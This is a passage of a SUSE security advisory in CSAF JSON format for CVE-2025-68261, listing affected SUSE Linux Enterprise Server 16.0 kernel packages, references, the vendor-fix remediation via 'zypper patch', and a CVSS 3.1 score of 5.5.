"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
